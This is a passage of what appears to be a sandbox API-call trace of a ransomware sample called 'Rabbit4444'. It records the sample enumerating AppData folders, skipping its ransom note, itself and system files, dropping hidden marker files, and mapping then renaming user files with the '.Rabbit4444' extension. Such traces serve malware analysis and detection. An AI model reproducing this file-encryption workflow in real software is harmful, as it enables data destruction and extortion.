[0065.358] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.358] CloseHandle (hObject=0x2a0) returned 1 [0065.360] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData") returned 96 [0065.360] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.360] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0463d2b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0065.361] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.361] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.361] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.361] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.361] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0463d2b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.361] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.361] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.361] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.361] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.361] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.361] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0463d2b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0463d2b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0489f4a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.361] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.361] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.361] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0463d2b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0463d2b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0489f4a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.361] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0065.361] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.361] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.362] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.362] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.362] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.363] CloseHandle (hObject=0x2cc) returned 1 [0065.363] CloseHandle (hObject=0x2a0) returned 1 [0065.363] GetCurrentThreadId () returned 0xd98 [0065.363] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0065.363] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings" [0065.363] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123140 | out: hHeap=0xe0000) returned 1 [0065.363] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0065.363] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings" [0065.363] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\" [0065.363] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0065.363] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.364] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.366] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.367] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.367] CloseHandle (hObject=0x2a0) returned 1 [0065.368] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings") returned 91 [0065.368] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.368] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0489f4a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0065.368] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.368] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.368] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.368] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.368] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0489f4a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.368] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.368] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.368] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.368] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.368] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.368] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0489f4a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0489f4a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0489f4a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.368] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.368] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.368] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7266a59f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0065.368] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.368] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.368] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0065.368] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0065.368] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0065.368] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0065.369] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0065.369] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0065.369] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0065.369] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0065.369] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0065.369] lstrcpyW (in: lpString1=0x130ebf0, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0065.369] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0065.369] lstrlenW (lpString="roaming.lock") returned 12 [0065.369] lstrlenW (lpString="Rabbit4444") returned 10 [0065.369] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0065.369] lstrlenW (lpString=".dll") returned 4 [0065.369] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0065.370] lstrlenW (lpString=".lnk") returned 4 [0065.370] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0065.370] lstrlenW (lpString=".ini") returned 4 [0065.370] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0065.370] lstrlenW (lpString=".sys") returned 4 [0065.370] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0065.370] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0065.370] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.370] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.370] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0065.370] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0065.370] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0065.370] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0065.370] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0065.370] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0065.370] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0065.370] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0065.370] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0065.370] lstrcpyW (in: lpString1=0x130ebf0, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0065.370] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0065.370] lstrlenW (lpString="settings.dat") returned 12 [0065.370] lstrlenW (lpString="Rabbit4444") returned 10 [0065.370] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0065.370] lstrlenW (lpString=".dll") returned 4 [0065.370] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0065.370] lstrlenW (lpString=".lnk") returned 4 [0065.370] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0065.370] lstrlenW (lpString=".ini") returned 4 [0065.370] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0065.371] lstrlenW (lpString=".sys") returned 4 [0065.371] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0065.371] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.371] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0065.371] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15668167826) returned 1 [0065.371] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0065.371] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0065.371] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0065.371] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0065.372] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0065.374] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11dff0 [0065.374] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0065.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dff0 | out: hHeap=0xe0000) returned 1 [0065.374] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0065.374] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11dff0 [0065.375] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0065.375] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dff0 | out: hHeap=0xe0000) returned 1 [0065.375] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0065.375] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15668543758) returned 1 [0065.375] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0065.375] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0065.375] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.375] CloseHandle (hObject=0x27c) returned 1 [0065.375] CloseHandle (hObject=0x2cc) returned 1 [0065.375] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 115 [0065.375] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0065.377] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0065.377] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0065.377] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.377] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.377] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.378] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.379] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.379] CloseHandle (hObject=0x2cc) returned 1 [0065.379] CloseHandle (hObject=0x2a0) returned 1 [0065.379] GetCurrentThreadId () returned 0xd98 [0065.379] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0065.379] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState" [0065.379] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11df28 | out: hHeap=0xe0000) returned 1 [0065.379] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0065.379] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState" [0065.379] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState\\" [0065.379] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0065.379] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.380] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.383] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.383] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.384] CloseHandle (hObject=0x2a0) returned 1 [0065.384] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState") returned 95 [0065.384] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.384] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x72644337, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf04b1646, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0065.384] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.384] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.384] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.384] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.384] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x72644337, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf04b1646, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", 